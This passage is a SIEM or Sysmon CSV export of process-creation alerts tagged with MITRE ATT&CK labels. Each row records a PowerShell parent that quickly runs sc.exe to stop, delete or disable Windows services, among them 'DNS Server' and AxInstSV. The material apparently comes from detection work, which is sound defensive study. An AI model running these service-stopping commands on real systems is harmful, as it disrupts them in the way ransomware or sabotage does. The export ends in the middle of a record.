C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.825370900Z"",""eventRecordID"":""3509"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.823\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00}\r\nProcessId: 1760\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® 
Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop \""DNS Server\""\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.823"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010ae9f2e00}"",""processId"":""1760"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop \\\""DNS Server\\\"""",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.758",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.778 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104e9d2e00} +ProcessId: 1088 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop Zational +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
Zational",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.782909900Z"",""eventRecordID"":""3506"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.778\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00104e9d2e00}\r\nProcessId: 1088\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Zational\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.778"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00104e9d2e00}"",""processId"":""1088"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® 
Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Zational"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.680",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.747 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b09b2e00} +ProcessId: 5624 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 
+ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.749533000Z"",""eventRecordID"":""3504"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.747\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010b09b2e00}\r\nProcessId: 5624\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:04.747"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010b09b2e00}"",""processId"":""5624"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.655",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.734 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d39a2e00} +ProcessId: 4032 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop AxInstSV +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.738353000Z"",""eventRecordID"":""3503"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.734\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010d39a2e00}\r\nProcessId: 4032\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop AxInstSV\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.734"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010d39a2e00}"",""processId"":""4032"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop AxInstSV"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.448",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.687 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102c982e00} +ProcessId: 7396 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop clr_optimization +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.689334400Z"",""eventRecordID"":""3500"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.687\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-00102c982e00}\r\nProcessId: 7396\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop clr_optimization\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.687"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-00102c982e00}"",""processId"":""7396"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop clr_optimization"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.309",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:04.644 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010bd952e00} +ProcessId: 748 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop aspnet_staters +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.647762800Z"",""eventRecordID"":""3497"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.644\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010bd952e00}\r\nProcessId: 748\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop aspnet_staters\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:04.644"",""processGuid"":""{df9fc3d3-b3f4-5ecf-0000-0010bd952e00}"",""processId"":""748"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop aspnet_staters"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:33.247",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: 
+RuleName: +UtcTime: 2020-05-28 12:52:04.623 +ProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c9942e00} +ProcessId: 3992 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config aspnet_staters Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config aspnet_staters Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:04.625873000Z"",""eventRecordID"":""3496"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:04.623\r\nProcessGuid: {df9fc3d3-b3f4-5ecf-0000-0010c9942e00}\r\nProcessId: 3992\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 